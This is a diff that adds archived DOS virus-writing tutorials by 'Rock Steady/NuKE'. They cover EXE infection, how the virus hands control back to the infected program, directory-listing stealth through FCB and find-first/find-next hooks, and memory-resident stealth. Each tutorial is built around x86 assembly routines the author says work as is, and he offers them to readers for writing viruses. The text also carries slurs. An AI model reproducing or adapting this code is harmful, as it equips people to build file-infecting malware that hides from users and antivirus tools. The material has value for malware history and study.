index 00000000..aed62e0b
--- /dev/null
+++ b/textfiles.com/virus/rstut005.txt
@@ -0,0 +1,175 @@
+           **************************************************  
+           ** EXE Infections : PART I  `Infection Process' **                
+           **                                              **                
+           **            By Rock Steady/NuKE               **
+           **************************************************
+              
+ We must admit there are HUGE amount of Lame Viruses out there. Ever       
+ wonder why so many people talk about the AIDS virus? Its a fucken over    
+ writting virus. Its HUGE in size and its written in PASCAL. Please! Have  
+ a little more respect for the virus world. What happened to that old      
+ Bulgarian Spirit? That too has died. Bulgaria isn't writting as many top  
+ viruses as it used to! Or are we in for a surprise? (USSR Kicks!)         
+                                                                           
+ Well to help people in advancing their Virus programming ability I will   
+ try to explain that basics in Infecting an EXE file. There are several    
+ ways to infect an EXE file. And I have tried several types. The best one  
+ I have programmed is the one you'll see. In Basic, it will infect EXEs    
+ by starting a new segment, only for the virus. This will infect EXEs over 
+ the size of 64k, and it is alot less complicated..                        
+                                                                           
+ Before we can begin we must know a few things, about EXEs. Let's say a    
+ .COM file has been loaded to segment address 1234:0000. When the COM file 
+ runs its code is limited to 1234:0000 to 1234:FFFF (64k). In the other    
+ end EXE files, are basicaly several COMs in one. Where EXE files can set  
+ up DATA struct in one segment, CODE in another, and STACK in another. EXEs
+ can have an unlimited amount of Segments, its limitation is Memory        
+ Availablity. And the EXE file keeps track of these Segments, with an      
+ EXE header, telling DOS what segments start where, How big the file is,   
+ the amount of memory needed to run. the EXE header is the first few bytes 
+ of the EXE file. Though if you use DEBUG to load an EXE file you will not 
+ run into the EXE header, as DEBUG uses the EXE header to load its CS:IP   
+ regesters with, the SS:SP and so on. Though you can view the EXE header   
+ with debug if you Rename that EXE file. So just do `DEBUG FILENAME.EQE'   
+ Just rename an EXE, the extension can be anything you wish, however don't 
+ go and rename it to COM or BIN, these are reserved Extensions, and debug  
+ treats them differently, Example if you rename it to COM debug will load  
+ the IP regester as 0100h. The EXE header is Usually 28 bytes, though it   
+ is save as 32 Bytes Long. As the size of the EXE header (Offset 8) is in  
+ multiple 16 bytes, so 28 bytes will have to be covered in (16*2)! But the 
+ last 4 bytes are unused, by dos, Though Doesn't STOP a VIRUS from using   
+ it? Just a poping ideas out in the open. Anyhow this is how the EXE header
+ consists, of..                                                            
+ START OFFSETS            DISCRIPTIONS                                     
+ (hex) (dec)                                                               
+   00 | 00 | Always 4D 5A. Marks this file as an .EXE file                 
+  *02 | 02 | Remainder after dividing load module's size by 512            
+  *04 | 04 | Size of file in 512 byte pages                                
+   06 | 06 | Number of relocation table entries                            
+  @08 | 08 | Size of header in paragraphs (16 bytes)                       
+   0A | 10 | Minumum number of paragraphs required after loaded program    
+   0C | 12 | Maximum number of paragraphs required after loaded program    
+  *0E | 14 | (SS) Offset of Stack Segment in Load module in paragraphs     
+  *10 | 16 | SP regester loaded with this word                             
+   12 | 18 | Negative sum (ignore overflow) of all words in file (CRC)     
+  *14 | 20 | IP register loaded with this word                             
+  *16 | 22 | (CS) Offset of Code Segment in load module in paragraphs      
+   18 | 24 | Offset of first relocation item.                              
+   1A | 26 | Overlay number. If no overlays used, this is 0                
+ * = Will be Edited by our Virus                                           
+ @ = Needed to help our reconstruction of the EXE header                   
+                                                                           
+ First thing to do is read the EXE header for the file to be infected!     
+ That can be resolved by...                                                
+     mov     ah,3fh                 ; Read from File BTW: BX=File Handle   
+     mov     cx,1ch                 ; Read 1Ch Bytes (28)                  
+     mov     dx,offset ds:[buffer]  ; Put it in our Buffer we set up!      
+     int     21h                    ; Call the Dos to do it.               
+     jc      error_exit             ; Error accured, Jmp to an Exit Routine
+ buffer  db      1Ch DUP (?)     ;This is how to set up your buffer.       
+ exe_ip  dw      0       ;This is were you will save the original          
+ exe_cs  dw      0       ;Registers from the EXE header!                   
+ exe_sp  dw      0       ;Put all theses DWs & DBs at the end of           
+ exe_ss  dw      0       ;you file, with all the others...                 
+ Next, after reading the first 28 bytes, you will need to set your file    
+ pointers to the end of the file.                                          
+                                                                           
+     mov     ax,4202h        ; Move Read/Write Pointer to End of File      
+     xor     cx,cx           ; plus offset (CX:DX)! So make sure CX:DX     
+     xor     dx,dx           ; are ZERO or else it will go further than    
+     int     21h             ; the End of File!                            
+     jc      error_exit      ; Also test for errors! Be a Smart Virus!     
+                                                                           
+ After bringing your virus to the end, you may start the infection         
+ process...                                                                
+ ;Remember BX = File Handle  DX:AX Pointer Location (EOF)                  
+     cmp    word ptr cs:[buffer],5A4Dh  ; Is file an .EXE?                 
+                                  /\ Reverse double word format            
+     jnz    error_exit           ;Exit its NOT an .EXE file!               
+     mov    cx,word ptr cs:[buffer+14h]  ;IP register Read                 
+     mov    word ptr cs:[exe_ip],cx      ;Save IP Register                 
+     mov    cx,word ptr cs:[buffer+16h]  ;CS Register Read                 
+     mov    word ptr cs:[exe_cs],cx      ;Save CS Register                 
+     mov    cx,word ptr cs:[buffer+10h]  ;SP Register Read                 
+     mov    word ptr cs:[exe_sp],cx      ;Save SP Register                 
+     mov    cx,word ptr cs:[buffer+0Eh]  ;SS Register Read                 
+     mov    word ptr cs:[exe_ss],cx      ;Save SS Register                 
+                                                                           
+ The following finds new CS:IP and SS:SP registers. It will create a new   
+ segment, and CS:IP will point to the beginning of the Virus. If you have  
+ other code, and the virus beginning is further down the First byte, just  
+ add the number of Bytes to AX.                                            
+     push   ax                                                             
+     push   dx                                                             
+     call   Find_New_Offsets     ;Refer to it at the END of this Text      
+     sub    dx,word ptr cs:[buffer+8h]  ;Minus CS offset by EXE header!    
+     mov    word ptr cs:[buffer+16h],dx ;Save new CS Register              
+     mov    word ptr cs:[buffer+14h],ax ;Save new IP Register              
+     pop    dx                                                             
+     pop    ax           ; Restore Original DX:AX Point Location (EOF)     
+     add    ax,virus_size      ; .STACKs are usually at the end of the code
+                               ; in the EXEs, since our virus is now at the
+                               ; End, we must move it after our virus, thus
+                               ; it back at the END of the File!           
+     adc    dx,0         ;Add with Carry Flag!                             
+     push   ax                                                             
+     push   dx                          ;Save new EOF pointer Location     
+     call   Find_New_Offsets            ;Get NEW offsets for SS:SP         
+     sub    dx,word ptr cs:[buffer+8h]  ;Subtract EXE header from File Size
+                                        ;as it should not be counted!      
+     add    ax,40h                      ;Move Stacks a little after EOF    
+     mov    word ptr cs:[buffer+0Eh],dx ;Save new SS Register for Stacks   
+     mov    word ptr cs:[buffer+10h],ax ;Save new SP Register for Stacks   
+     pop    dx                                                             
+     pop    ax           ;Restore Original EOF (With Virus Counted)        
+     push   bx                                                             
+     push   cx                                                             
+     mov    cl,7                 ;In Simple, here we are figuring out      
+     shl    dx,cl                ;the New File Size in 512byte pages       
+     add    bx,ax                ;Now Rather than using the DIV and        
+     mov    cl,9                 ;MOD function, I used this one because    
+     shr    bx,cl                ;It is alot FASTER for the Processor!     
+     add    dx,bx                ;The Result is exactly same, But          
+     and    ax,1FFh              ;Shifting bits, results of the            
+     jz     Its_Even             ;Same function when dealing with base     
+     inc    dx                   ;16 numbers!                              
+ Its_Even:            ;Read PeterNorton's Advanced ASM Language for        
+     pop    cx        ;more neat short cuts for the above!                 
+     pop    bx                                                             
+     mov    word ptr cs:[buffer+2h],ax   ;Remainder after of 512 pages     
+     mov    word ptr cs:[buffer+4h],dx   ;New File Size in 512 pages       
+ Now we are Ready to write the virus to the EXE File! (Yeah!)              
+     mov    ah,40h                 ;Write to File                          
+     mov    dx,offset init_Virus   ;This is the BEGINNING offset of your   
+                                   ;Virus! (Look at NuKE PoX v1.1)         
+     mov    cx,Virus_size          ;Virus Size                             
+     int    21h                                                            
+     jc     error_exit             ;Error Exit dude...                     
+     mov    ax,4200h               ;Move File Pointer to the BEGINNING     
+     xor    cx,cx                  ;of the EXE so, we may now write the    
+     xor    dx,dx                  ;EXE header!                            
+     int    21h                                                            
+     mov    ah,40h                ;Write to File                           
+     mov    dx,offset ds:[buffer] ;Write all the stuff in the EXE_Header   
+     mov    cx,1Ch                ;CX=number of bytes to write             
+     int    21h                   ;Do it!                                  
+                                                                           
+ ;  finds new Offsets for CS:IP & SS:SP Registers                          
+ Find_New_Offsets        PROC    NEAR                                      
+         push    bx                                                        
+         push    cx                                                        
+         mov     cl,0Ch              ;(c) Rock Steady/NuKE                 
+         shl     dx,cl               ; I'm dividing here....               
+         mov     bx,ax                                                     
+         mov     cl,4                ; And multiply by 16 hear             
+         shr     bx,cl                                                     
+         add     dx,bx                                                     
+         and     ax,0Fh                                                    
+         pop     cx                                                        
+         pop     bx                                                        
+         retn                                                              
+ Find_New_Offsets        ENDP                                              
+                         Rock Steady / NuKE                                
+ PS: This code works 100% as is! (Resident Virus) For Non-Residents add    
+     a location pointer! Besides, Why the Hell are you write a non-Ressy   
+     Virus? You Gay? Look at `NuKE PoX V1.1' sources to see this working!  
diff --git a/textfiles.com/virus/rstut006.txt b/textfiles.com/virus/rstut006.txt
new file mode 100644
index 00000000..cdf71584
--- /dev/null
+++ b/textfiles.com/virus/rstut006.txt
@@ -0,0 +1,101 @@
+                      
+                  *****************************   
+                  **  EXE Infectors Part II  **                              
+                  **                         **                              
+                  **   By Rock Steady/NuKE   **
+                  *****************************
+
+ The first part consisted on how to Infect the EXE file, from a resident   
+ virus. However, that is only HALF the code and understanding needed for   
+ EXE infectors. The part to follow, is on how to give control back to the  
+ original EXE file. This is one part of EXE infectors, that mostly EVERY   
+ ONE tend to forget to point out. Big tickle, you know how to infect the   
+ EXE, but can you make the original EXE run after its infection? Do you    
+ know how to restore the registers we took from the EXE header? Anyhow     
+ lets get going...                                                         
+                                                                           
+ If the Infected EXE file is now executed, the first Line of Code it will  
+ encounter will be the first byte of our Virus. Since CS:IP have been      
+ changed in the header (Part I) to point to our Virus. The first thing     
+ we will need to do, is set up a Variable offset, (As I call it). Basically
+ when TASM compiles our virus, all variables and other data locations are  
+ given a FIX address. Though in the case of the Virus this is NOT GOOD as  
+ viruses, tend to append themselves, and therefore variables are never     
+ in the same location...                                                   
+ Fig 1.                                                                    
+   (Original ASM Source)                                                   
+           CALL   doit_Now             ;Call PUSHes CS:IP addresses        
+ doit_now: POP    BP                   ;POP in BP the IP register          
+           SUB    BP,offset doit_now   ;Make it EQUAL 0 for first Compile! 
+           MOV    AX,word ptr cs:[variable+BP] ;BP=0 now it works!         
+           ...                                                             
+ variable  dd     55                                                       
+ When TASM Compiles the above Code it turns it into Fig 2. (Below)         
+ Fig 2.                          Fig 3.                                    
+   (Virus Just Compiled)                (Virus Infect to a file)           
+ 1234:0100   CALL  1234:0103          1234:0100  JMP  500                  
+ 1234:0103   POP   BP                 1234:0102  ...   (Infect File)       
+ 1234:0104   SUB   BP,0103                       ...      ''    ''         
+ 1234:0107   MOV   AX,[0200+BP]       1234:0200  ...      ''    ''         
+             ...                                 ...      ''    ''         
+ 1234:0200   dd    55                 1234:0500  CALL 1234:0503            
+                                      1234:0503  POP  BP       (BP=503)    
+                                      1234:0504  SUB  BP,0103  (BP=400)    
+                                      1234:0507  MOV  AX,[0200+BP]         
+                                                 ...      (200+BP=600)     
+                                      1234:0600  dd   55                   
+ Later when the Virus infects a File, it will represent Fig 3. Now, when   
+ the CALL command is executed, it PUSHes into the Stacks the NEXT CS:IP    
+ so when it has to RETurn, all it has to do is POP back the CS:IP to know  
+ exactly where it left off! So we can take advantage of the command, by    
+ POPing back ourselves, thus this will give us the NEXT byte from the CALL 
+ command. which as you see, in the examples is our POP BP statement.       
+                                                                           
+ However when the Virus is Freshly Compiled, all Registers values are GOOD,
+ so that is why we must make BP=0 the first time, as the variables were    
+ set according to the sources, so no adjustment needed, though when we     
+ infect a file, this BP Variable Pointer come ALIVE! (View Fig 3. + Fig 2.)
+                                                                           
+ Boy, That was the HARDEST part of that, Now if you found that simple pat  
+ yourself on the back, as that is the only `BIG' Conflict people tend to   
+ disregard or forget. So any time while you are NOT resident but infected  
+ on the file, and you are running code from the infected file just use the 
+ that BP Variable Pointer, for any data being loaded... Now lets put the   
+ routine together, along with the routine to EXECUTE the original EXE file 
+                                                                           
+ ; After the Virus Has moved a copy of itself in memory, Control must be   
+ ; Given back to the Original EXE file we just infected... This is the     
+ ; Routine to do it..                                                      
+ exit_exe_file:                                                            
+         mov     bx,word ptr cs:[buffer+22][bp]  ;Loads CS register        
+         mov     ax,cs                           ;Move current CS in AX    
+         sub     ax,bx                           ;Subtract for alinment    
+         mov     dx,ax                                                     
+         add     ax,word ptr cs:[exe_cs][bp]     ;Get ORIGINAL CS          
+         add     dx,word ptr cs:[exe_ss][bp]     ;Get ORIGINAL SS          
+         mov     bx,word ptr cs:[exe_ip][bp]     ;Get ORIGINAL IP          
+         mov     word ptr cs:[fuck_yeah][bp],bx  ;Put IP                   
+         mov     word ptr cs:[fuck_yeah+2][bp],ax ;Put CS (Reverse Order)  
+         mov     ax,word ptr cs:[exe_sp][bp]     ;Get ORIGNAL SP           
+         mov     word ptr cs:[Rock_fix1][bp],dx  ;Put in SS                
+         mov     word ptr cs:[Rock_fix2][bp],ax  ;Put in SP                
+         db      0B8h     ;The Byte `B80000' is really a MOV AX,????       
+ Rock_Fix1:               ;???? is the Value of SS that we will put into   
+         dw      0        ;THIS LINE!                                      
+         cli                     ;Disable Interrupts (No Jamming)          
+         mov     ss,ax           ;Mov the AX (really SS) into SS register  
+         db      0BCh    ;Byte `BC0000' is really a MOV SP,????            
+ Rock_Fix2:              ;???? is the Value of SP that we will put into    
+         dw      0       ;THIS LINE!!                                      
+         sti                     ;Enable Interrupts                        
+         db      0EAh    ;The Byte `EA00000000' is a JMP CS:IP How ever    
+ fuck_Yeah:              ;IP comes FIRST then CS (Reverse Order) And then  
+         dd      0       ;the Virus does the JMP CS:IP to the Original     
+                         ; Simple huh?                                     
+ ; To see this as a HOLE Virus look at `NuKE PoX V1.1' Virus Sources Codes 
+ ; Made by me (Rock Steady) As you can see the Code is ORGINAL, and nothing
+ ; that looks like any of them Sources we see around. Though I give it to  
+ ; you to use.                                                             
+                         Rock Steady / NuKE                                
+   `One, Two, One, Two, One, Two... Come On Get into that Olympic Spirit'  
+     `Lose Them pounds, Get Rid of that unwanted FAT of them Drives...'    
diff --git a/textfiles.com/virus/rstut007.txt b/textfiles.com/virus/rstut007.txt
new file mode 100644
index 00000000..aac15641
--- /dev/null
+++ b/textfiles.com/virus/rstut007.txt
@@ -0,0 +1,157 @@
+                          
+                     *****************************    
+                     **   Directory Stealth     **                              
+                     **                         **                              
+                     **   By Rock Steady/NuKE   ** 
+                     *****************************
+
+  Stealth Viruses are the Viruses that I must admit Anti-Viral Queers      
+  Don't tend to like at all. Emagine if we added a Polymorphic feature into
+  the Stealth Virus? But, if you want to Continue Writing Viruses you have 
+  to make them Stealth. MS-DOS Version 6.0 Now comes with Virus Scanners   
+  and CRC & Checksum Checkers. In order to stop many viruses, But it will  
+  NEVER stop the `Stealth' Virus that is SMART of those AV features!       
+                                                                           
+  People think that there is ALOT of more INFECTED PCs since the virus     
+  threat, started in 1986-7. Even though in the beginning only 10 or so    
+  viruses were known, they Infected more systems, Compared to the viruses  
+  today, where we have about 1300 and growing. But the truth is LESS PCs   
+  are getting infect now, as people are now Virus Aware. With all the      
+  utilities out, any joker can stop and clean a virus in seconds. Come     
+  on, how many people MEMORIZED COMMAND.COM size? Out of my head its       
+  47845 (MS-Dos V5.0). A simple increase of size tells me I got a problem. 
+                                                                           
+  A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth  
+  feature. That will NOT show you the INCREASE of file size, when the      
+  virus infects it. I have played with a few routines as such. I have      
+  tried reducing the File size in the FAT area, which results in the       
+  famous CHKDSK error reports of Loss Sectors, or Cross Links... And       
+  fixing them with CHKDSK will result in damaging the file for good.       
+                                                                           
+  What can we do? How about reducing the File size Right AFTER its read    
+  by DOS or any Utilities and right BEFORE its display on the screen!      
+  Yeah that's an Idea, Here's how to go about it...                        
+                                                                           
+  %Theory%                                                                 
+  ~~~~~~~~                                                                 
+  First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h       
+  function 11h & 12h is called! If you don't know how to Hook Interrupts   
+  Read RESIDENT VIRIIs Article in this NewsLetter.                         
+                                                                           
+   Int21_Handler:                                                          
+          cmp     ah,11h                  ;Is a DOS `Dir' being done?      
+          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'      
+          cmp     ah,12h                  ;Is a DOR `Dir' Being done?      
+          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'      
+                                                                           
+  Int21Call:                                                               
+          jmp     dword ptr cs:[Int21]    ;Or Else Goto ORIGINAL Int 21h   
+          ret                             ;Is need for the CALL of below   
+                                                                           
+  That's all that is needed in your Int21_Handler. Ofcourse if you are     
+  infecting file that are being Execute you add it ABOVE! Anyhow lets      
+  Explain the `DIR_STEALTH'                                                
+                                                                           
+  Offset  Size   Description                                               
+    ������������������[Normal FCB]����������������������������������       
+    00h �  1  �  Drive Number 00=current drive 01=A,02=B,03=C etc..        
+    01h �  8  �  Filename. Unused Spaces padded with Blanks                
+    09h �  3  �  Extension of Filename.                                    
+    0Ch �  2  �  Current block. points to block of records                 
+    0Eh �  2  �  Record Size.                                              
+    10h �  4  �  FileSize in Bytes. (Low-order first, then high-order)     
+    14h �  2  �  Date of Last Write. YY-MM-DD into bits YYYY-YYYM-MMMD-DDDD
+    16h �  2  �  Time of Last Write. HH:MM:SS into bits HHHH-HMMM-MMMS-SSSS
+    18h �  4  �  Reserved                                                  
+   *1Ch �  4  �  SAME `10h' but THIS FILESIZE gets printed on Screen!      
+    20h �  1  �  Offset of current record                                  
+    21h �  4  �  Relative Record                                           
+                                                                           
+  * = Field Changed by virus.                                              
+                                                                           
+  Extended FCB: Are Identical to the Normal FCB but, it has three new      
+  ~~~~~~~~~~~~  fields totalling 7 bytes. (That is why we add y to BX)     
+                The additional 7 bytes are added to the BEGINNING!         
+                                                                           
+                                                                           
+  Offset  Size   Description                                               
+    ������������������[Extended FCB]��������������������������������       
+   -07h �  1  �  ALWAYS FFh tells use this is an Extended FCB              
+   -06h �  5  �  Reserved for DOS                                          
+   -01h �  1  �  Attribute Byte                                            
+                                                                           
+  So if we have an Extended FCB the first Byte will be FFh simply INC it   
+  and if its ZERO you got a Extended FCB! You can also CMP ES:[BX],FFh     
+  but that takes too many Bytes! Be COMPACT!!!                             
+                                                                           
+ %Algorithms%                                                              
+ ~~~~~~~~~~~~                                                              
+ CONDISTION: After calling Function 11h/12h (Int 21h) it will              
+       search with the contents in the FCB. (*.*) which the DS:DX          
+       registers point to the FCB. If successful it will DUPLICATE         
+       the specified of the FCB in the current DTA (Disk Transfer Area)    
+       And basically we will EDIT the info in the DTA!                     
+ NOTE: Just because we are using the DTA doesn't mean this will work for   
+       function 4Eh/4Fh (Int 21h) that uses the DTA and ASCIIZ strings to  
+       search, that is a different procedure, though somewhat the same as  
+       this one. See Method #2, for that.                                  
+                                                                           
+   Step 1. We call the Int 21h so we may have the results to play with     
+           BEFORE DOS displays them on screen.                             
+   Step 2. Get the Current PSP, As the FCB is located inside the PSP       
+           in COM files its CS:0000 - CS:00FF. But in EXEs it can be any-  
+           where, Int21h/AH=51 (Undocemented) will do this for us.         
+   Step 3. Unmask the seconds (see if its infected) Quit if NOT            
+   Step 4. Get the current DTA                                             
+   Step 5. Test if it is Either an Extended FCB or Normal! If Extended     
+           Simple add 7h to the Address. (As Extended only have 7 bytes    
+           extra in the begining)                                          
+   Step 6. Minus File size from the DTA! & Restore Time Back               
+                                                                           
+ ; Here it is... Method #1                                                 
+                                                                           
+   dir_stealth:                                                            
+          pushf                   ;Fake an INT Call                        
+          push    cs              ;Needed to return back HERE! (Virus)     
+          call    Int21Call       ;Call the interrupt (See `Int21_Handler')
+          test    al,al           ;AL=00h if successful                    
+          jnz     no_good         ;Not Successful. Errors Eg:No More Files 
+                                                                           
+          push    ax                                                       
+          push    bx      ;Save them since they will be used! So when      
+          push    es      ;We exit all is restored to as Before!           
+          mov     ah,51h  ;(Undocmented) Gets the Current PSP and puts     
+          int     21h     ;it into BX                                      
+                                                                           
+          mov     es,bx         ;ES now has PSP segment Address            
+          cmp     bx,es:[16h]   ;Did we open a Good PSP?                   
+          jnz     exit_man      ;No, PSP unavailable, Exit Dude            
+          mov     bx,dx         ;BX now points to the Original FCB in PSP  
+          mov     al,[bx]       ;AL now has the current drive              
+          push    ax            ;Save it to tell if its an Extended FCB    
+          mov     ah,2fh        ;Get DTA (Disk Transfer Address)           
+          int     21h                                                      
+  ;Also before we start fiddling around we must know if we are working with
+  ;And EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended
+  ;Has three fields appended to the normal one... (Above)                  
+                                                                           
+          pop     ax            ; AL = FFh if Extended FCB or else Drive # 
+          inc     al            ; Will tell us if we have an Extended FCB  
+          jnz     fcb_ok        ; No, We don't continue as normal          
+          add     bx,7h         ; Yes, we do, add 7h to BX pointer         
+  fcb_ok: mov     ax,es:[bx+17h]  ;Gets Seconds Field                      
+          and     ax,1fh          ;Unmask to have SECONDS only             
+          xor     al,1dh          ;is it 58 seconds? (1d * 2)              
+          jnz     not_infected    ;Nope, okay its not infected             
+          and     byte ptr es:[bx+17h],0e0h   ;Restores seconds            
+          sub     es:[bx+1dh],virus_size      ;Subtract FileSize with Virii
+          sbb     es:[bx+1fh],ax              ;Needed to fix up Bytes with 
+  not_infected:                               ;Borrowing                   
+          pop     es              ;Ciao, Ciao                              
+          pop     bx                                                       
+          pop     ax                                                       
+  no_good:iret             ;Pretend you came back from an Interrupt call!  
+  ;----------------------------The EnD-------------------------------------
+                          Rock Steady / NuKE                               
+                 `Feed my Frankenstein', Alice Cooper                      
+  NOTE: This Code Works, Look at NuKE PoX V1.1 to see it...                
diff --git a/textfiles.com/virus/rstut008.txt b/textfiles.com/virus/rstut008.txt
new file mode 100644
index 00000000..8b118867
--- /dev/null
+++ b/textfiles.com/virus/rstut008.txt
@@ -0,0 +1,97 @@
+                       
+                  *******************************     
+                  **   Dir Stealth Method 2    **                            
+                  **                           **                            
+                  **    By Rock Steady/NuKE    **
+                  *******************************
+
+ Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton  
+ Utilities, or *SOME* File Managing systems like DOS-Shell, the File       
+ increase of infected files is know visable. There is no doubt about       
+ it, if you only put Method #1 in your virus you will encounter times      
+ were the file increase shows. Its not because your Routine isn't good!    
+ But due to the fact that there is another way to Read the Dir Listing     
+ by DOS. An this method is Call File-find by ASCIIZ format.                
+                                                                           
+ We just learned how to edit File-Find by FCB. Which is used by MS-DOS     
+ PC-DOS and some other programs. But unlike the others, they use the       
+ ASCIIZ file-Find method as it is EASIER to open, close, edite, and any    
+ other file access routine is ALOT easier with the ASCIIZ or (File Handle) 
+ system. So we will make our Virus Stealth to Method #2! Making us 100%    
+ Stealth from file-finds...                                                
+                                                                           
+ The Function we have to Intecept is Interrupt 21h, with Functions         
+ AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File)     
+ The Way to go about it is Very much ALIKE to the first one, so just       
+ understand the thoery, and you'll be able to program it within            
+ seconds.                                                                  
+                                                                           
+ When this function is called, it will fill the current DTA with 12        
+ entries totally 43 bytes. The DTA will be set up as follows: (below)      
+ BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T     
+      like the FCB, or PSP that is anyways the same! You can play with     
+      this as you wish. You also use this DTA to read the Command Line     
+      Parameters...etc...                                                  
+                                                                           
+  Offset Size            Description                                       
+   �����������������������������������������������������                   
+    00h � 1  � Drive Letter                                                
+    01h � 11 � Seach Template (Eg:????????COM)                             
+    0Ch � 1  � Attribute Search                                            
+    0Dh � 2  � Entry count within Directory                                
+    0Fh � 2  � Cluster Number of start of parent directory                 
+    11h � 4  � Reserved (Atleast Undocumented)                             
+    15h � 1  � Attribute of File FOUND                                     
+  @ 16h � 2  � File's Time  (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year  
+    18h � 2  � File's Date  (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year    
+  * 1Ah � 4  � File's Size (Word Reverse Order, Dah!!?!)                   
+    1Eh � 13 � ASCIIZ File name & Extension                                
+  * = Must be Edited by Virus is File Infected                             
+  @ = Needed to Check if File is Infected. (Seconds Field)                 
+                                                                           
+  %Algorthm%                                                               
+  ~~~~~~~~~~                                                               
+     CONDISTION: DS:DX points to ASCIIZ of file search.                    
+                 CX: Contains File Attributes                              
+                                                                           
+         Step 1. Call Dos so it fills the DTA with its findings            
+         Step 2. Test for CF=1 (Carry Flag) as error happened              
+                 errors happen if File not found, no more files etc...     
+         Step 3. Get Seconds Field And UnMask Seconds                      
+         Step 4. Check if seconds = 58 (What ever your using) Quit if NOT  
+                 Notice we use `XOR  AL,1Dh' rather than `CMP   AL,1Dh'    
+                 Check in your ASM Bible, which is Faster? Size?           
+                 Remember speed & size is EVERYTHING, That is why          
+                 My lastest are quite small viriis for stealthness!!       
+         Step 5. If Infected Subtract Virus Size from File                 
+         Step 6. Quit                                                      
+                                                                           
+ ;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this    
+ ;Routine...  (Look at Method #1 for Int21h handler)                       
+ Dir_Stealth2                                                              
+         pushf                        ;Fake an Int Call                    
+         push    cs                   ;Save our location                   
+         call    int21Call            ;Step #1                             
+         jc      no_good              ;Error Split                         
+         push    ax                                                        
+         push    bx                                                        
+         push    es                                                        
+         mov     ah,51h               ;Get Current DTA                     
+         int     21h                  ;ES:BX --> DTA                       
+                                                                           
+         mov     ax,es:[bx+16h]       ;Get File Time                       
+         and     ax,1fh               ;Un Mask Seconds field               
+         xor     al,1dh               ;Is it 58 Seconds?                   
+         jnz     not_infected         ;Not infected! Dah?                  
+         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
+         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
+ not_infected:                                                             
+         pop     es                                                        
+         pop     bx                   ;Restore Registers                   
+         pop     ax                                                        
+ no_Good:iret                                                              
+ ; This code WORKS and is also 100% (c) Rock Steady / NuKE                 
+ ;--------------------------EnD-------------------------------             
+                                                                           
+                            Rock Steady                                    
+         `WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'               
diff --git a/textfiles.com/virus/rstut009.txt b/textfiles.com/virus/rstut009.txt
new file mode 100644
index 00000000..b9efe117
--- /dev/null
+++ b/textfiles.com/virus/rstut009.txt
@@ -0,0 +1,72 @@
+                        
+                  *******************************    
+                  **      Memory Stealth       **                              
+                  **                           **                            
+                  **    By Rock Steady/NuKE    **
+                  *******************************
+
+The Advantages of having a Memory Resident Virus, are unlimited. When our  
+virus goes `TSR' it REALLY doesn't do ANYTHING. It just stays there,       
+waiting to be called upon. the 80x86 really doesn't MULTITASK, so don't    
+think the virus runs `in the Background' TSRs tend to hook on Interrupts,  
+depending what function they must do. If it must be called upon OFTEN,     
+hook Int 1C, if your must run when an File is Executed/Open/Close Hook     
+Int 21h. And everytime Int 21h is called, Your Virus Runs FIRST, then it   
+calls the original Int 21h.                                                
+                                                                           
+I will try to explain on how cut off a block of Memory, Then we'll         
+allocate memory for the Virus, change the program MCB, and move the        
+virus resident in memory.                                                  
+                                                                           
+para_size       equ     3                                                  
+                                                                           
+        mov     cx,es               ;Get current Segment                   
+        dec     cx                  ;Subtract 1, so we have MCB            
+        mov     es,cx               ;Restore it back to ES                 
+        mov     bx,es:para_size     ;BX=MCB Size in Paragraphs             
+        mov     dx,virus_size       ;DX=Virus Size                         
+        mov     cl,4                ;Unfortunately, VirusSize is in Bytes  
+        shr     dx,cl               ;While memory size is calculated in    
+        add     dx,4                ;paragraphs (16-Byte)                  
+        mov     cx,es               ;Start to Restore the Old Segment in ES
+        sub     bx,dx               ;oh, yeah, Minus Virus - Current memory
+        inc     cx                  ;Increment CX                          
+        mov     es,cx               ;Put it back, NOTICE a PUSH ES + POP ES
+        mov     ah,4ah              ;would have been BETTER!!!!!           
+        int     21h                 ;Call Dos to Adjust Memory block Size  
+                                                                           
+; First part has been easily completed, Next code, Allocates Memory for    
+; the Virus...                                                             
+        jc      exit_com            ;Test, incase Error Happened           
+        mov     ah,48h              ;Allocate Memory function              
+        dec     dx                                                         
+        mov     bx,dx               ;Number of 16-Byte Paragraphs to       
+        int     21h                 ;Allocate                              
+                                                                           
+; Next this Function Returns the Segment of the Allocated memory Block     
+; in AX register. So edit its MCB and move the virus resident.             
+mem         equ      2        ;Put theses with the rest...                 
+        jc      exit_com            ;Another Test for Errors...            
+        dec     ax                  ;Get it MCB                            
+        mov     es,ax               ;Put it into ES                        
+        mov     cx,8h                                                      
+        mov     es:mem,cx           ;Fix MCB PSP blocks Owner              
+        sub     ax,0fh                                                     
+        mov     di,103h             ;Offset of where virus will start.     
+        mov     es,ax               ;With is Segment                       
+        mov     si,bp               ;Put BP (Delta Offset) in SI           
+        add     si,offset init_virus ;Add to point to the begining of Virus
+        mov     cx,virus_size       ;How many Bytes to move?               
+        cld                         ;Clear Direction Flag (Ascending)      
+        repne   movsb               ;Copy from DS:SI to ES:DI              
+                                                                           
+That is all needed to do the trick. And it will not show up with the Memory
+Mapping Utilities like MEM or CHKDSK. However Dos will report Available    
+memory to be short by the Number of Paragraphs we Allocated. I will try    
+to fix this DARN thing that drives me crazy, I believe it can be solved    
+like our FCB Dir Method, Where we can add the Number of Paragraphs our     
+Virus Allocated back to them Memory Mapping Utilities. There IS a WAY!     
+And we will find it... This topic will be continued in Info Journal #5.    
+                                                                           
+                                Rock Steady                                
+              `Check out N-PoX(es) to see this Routine Working'            
diff --git a/textfiles.com/virus/rstut010.txt b/textfiles.com/virus/rstut010.txt
new file mode 100644
index 00000000..9c7bee60
--- /dev/null
+++ b/textfiles.com/virus/rstut010.txt
@@ -0,0 +1,540 @@
+================================================================================
